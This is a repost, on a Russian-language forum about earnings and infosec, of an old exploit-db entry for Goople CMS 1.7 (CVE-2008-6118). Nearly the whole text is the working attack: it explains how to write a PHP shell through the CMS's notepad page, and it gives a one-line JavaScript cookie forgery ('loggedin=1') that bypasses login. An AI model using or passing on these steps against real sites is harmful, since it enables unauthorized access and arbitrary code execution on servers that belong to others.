Goople CMS 1.7 - Arbitrary Code Execution | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 7210

Проверка EDB

Пройдено

Автор: X0R

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2008-6118

Дата публикации: 2008-11-24

Код:

-============================================-
Autore: x0r - Evolution Team
Msn: [email protected]
Cms: Goople Cms 1.7
Bug: Arbitrary File Creation
Download:
http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
-============================================-

Exploit:

#Attack One

Logg yourself like a normal user then in your meno go on "Notepad" (
/win/notepad/index.php ), in this notepad you can make a php shell :P

#Attack Two

Use this js code for bypass the log in: javascript:document.cookie =
"loggedin=1; path=/"; <--- tnx BeyazKurt

And then go to /win/notepad/index.php


Greetz: Amore mio oggi sono 48 giorni...Ti AmO Da Impazzire... A + M....
Bimba Mia Sei La Mia Vita...

# milw0rm.com [2008-11-24]

Источник: www.exploit-db.com

Поиск

Exploit Goople CMS 1.7 - Arbitrary Code Execution

Exploiter

Похожие темы